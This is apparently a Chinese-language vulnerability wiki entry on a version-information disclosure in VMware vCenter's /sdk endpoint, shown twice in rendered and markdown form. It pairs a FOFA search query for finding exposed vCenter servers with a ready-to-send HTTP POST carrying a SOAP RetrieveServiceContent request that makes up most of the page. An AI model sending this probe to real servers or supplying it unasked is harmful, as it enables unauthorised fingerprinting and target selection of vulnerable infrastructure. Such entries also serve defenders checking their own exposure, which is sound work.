fofamini-wiki

登录白背景

源码

VMware vCenter sdk存在版本信息泄露漏洞

一、漏洞简介

VMware vCenter Server是美国威睿（Vmware）公司的一套服务器和虚拟化管理软件。该软件提供了一个用于管理VMware vSphere环境的集中式平台，可自动实施和交付虚拟基础架构。VMware vCenter vimServiceVersions存在版本信息泄露漏洞

二、影响版本

VMware vCenter

三、资产测绘

fofatitle="ID_VC_Welcome"

四、漏洞复现

POST /sdk HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 579
 
<?xml version="1.0" encoding="UTF-8"?>
<soap:Envelope
    xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
    xmlns:xsd="http://www.w3.org/2001/XMLSchema"
    xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
    <soap:Header>
        <operationID>00000001-00000001</operationID>
    </soap:Header>
    <soap:Body>
        <RetrieveServiceContent
            xmlns="urn:internalvim25">
            <_this xsi:type="ManagedObjectReference" type="ServiceInstance">ServiceInstance</_this>
        </RetrieveServiceContent>
    </soap:Body>
</soap:Envelope>

原文: https://www.yuque.com/xiaokp7/ocvun2/ul21gh2f3q8quapt

# VMware vCenter sdk存在版本信息泄露漏洞

# 一、漏洞简介
VMware vCenter Server是美国威睿（Vmware）公司的一套服务器和虚拟化管理软件。该软件提供了一个用于管理VMware vSphere环境的集中式平台，可自动实施和交付虚拟基础架构。VMware vCenter vimServiceVersions存在版本信息泄露漏洞

# 二、影响版本

- VMware vCenter

# 三、资产测绘

- fofa`title="ID_VC_Welcome"`

![image.png](./img/UnqXn8QfIwR_Rv3y/1716017090282-f90f105e-743a-48cd-bc8c-8043d4492021-861764.png)

# 四、漏洞复现
```
POST /sdk HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 579
 
<?xml version="1.0" encoding="UTF-8"?>
<soap:Envelope
    xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
    xmlns:xsd="http://www.w3.org/2001/XMLSchema"
    xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
    <soap:Header>
        <operationID>00000001-00000001</operationID>
    </soap:Header>
    <soap:Body>
        <RetrieveServiceContent
            xmlns="urn:internalvim25">
            <_this xsi:type="ManagedObjectReference" type="ServiceInstance">ServiceInstance</_this>
        </RetrieveServiceContent>
    </soap:Body>
</soap:Envelope>
```
![image.png](./img/UnqXn8QfIwR_Rv3y/1716017767291-4ef54532-0406-497c-acf7-baa9e45e3a1f-610837.png)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ul21gh2f3q8quapt>